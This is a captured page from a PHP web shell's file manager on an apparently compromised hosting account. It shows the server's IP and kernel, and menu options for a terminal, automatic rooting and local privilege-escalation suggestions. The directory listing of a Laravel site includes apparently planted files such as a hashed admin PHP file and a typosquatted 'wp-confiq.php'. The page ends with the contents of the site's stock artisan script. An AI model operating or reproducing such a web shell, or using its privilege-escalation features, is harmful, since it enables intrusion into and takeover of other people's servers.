Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oishifashion /
ap.oishifashion.com /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-08-22 10:15
Modules
[ DIR ]
drwxr-xr-x
2025-12-23 06:34
app
[ DIR ]
drwxr-xr-x
2025-12-23 06:30
bootstrap
[ DIR ]
drwxr-xr-x
2025-12-23 00:45
database
[ DIR ]
drwxr-xr-x
2025-12-23 02:54
lang
[ DIR ]
drwxr-xr-x
2025-12-23 03:05
public
[ DIR ]
drwxr-xr-x
2025-12-23 06:32
resources
[ DIR ]
drwxr-xr-x
2025-12-23 05:03
routes
[ DIR ]
drwxr-xr-x
2025-12-23 06:15
soft
[ DIR ]
drwxr-xr-x
2025-12-23 04:51
storage
[ DIR ]
drwxr-xr-x
2025-12-23 03:01
tests
[ DIR ]
drwxr-xr-x
2025-12-23 03:02
vendor
[ DIR ]
drwxr-xr-x
2025-12-23 05:11
wp-admin
[ DIR ]
drwxr-xr-x
2025-12-23 03:05
wp-content
[ DIR ]
drwxr-xr-x
2025-12-23 04:55
wp-includes
[ DIR ]
drwxr-xr-x
2025-12-23 08:04
.env
2.33
KB
-rw-r--r--
2025-08-12 13:41
.env.example
2.17
KB
-rw-r--r--
2025-08-12 12:05
.gitattributes
111
B
-rw-r--r--
2025-08-12 12:04
.gitignore
462
B
-rw-r--r--
2025-08-12 12:04
.htaccess
621
B
-r--r--r--
2025-12-23 02:15
.php_cs
470
B
-rw-r--r--
2025-08-12 12:04
.prettierrc
98
B
-rw-r--r--
2025-08-12 12:04
.shift
131
B
-rw-r--r--
2025-08-12 12:04
.user.ini
590
B
-rw-r--r--
2025-11-19 15:04
16940c9f59d28badmin.php
9.25
KB
-rw-r--r--
2025-12-16 02:54
8SNJpG3M2iNPoMlrzDD8hPiqaYEUsItyA2CysP5x
202
B
-rw-r--r--
2025-12-09 20:25
artisan
1.65
KB
-rw-r--r--
2025-02-06 04:36
composer.json
3.39
KB
-rw-r--r--
2025-02-06 04:36
composer.lock
481.94
KB
-rw-r--r--
2025-02-06 04:36
content.php
4.42
KB
-rw-r--r--
2025-09-28 05:34
error_log
2.92
MB
-rw-r--r--
2025-12-23 08:04
index.php
55.12
KB
-r--r--r--
2025-12-23 02:15
modules_statuses.json
469
B
-rw-r--r--
2025-02-06 04:36
phpunit.xml
1.15
KB
-rw-r--r--
2025-02-06 04:36
readme.md
757
B
-rw-r--r--
2025-02-06 04:36
readme.pdf
19.33
KB
-rw-r--r--
2025-02-06 04:36
wp-blog-header.php
2.74
KB
-rw-r--r--
2025-12-18 07:34
wp-confiq.php
105.03
KB
-rw-r--r--
2025-12-18 07:34
wp-cron.php
2.74
KB
-rw-r--r--
2025-12-18 07:34
Save
Rename
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any of our classes manually. It's great to relax. | */ require __DIR__ . '/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);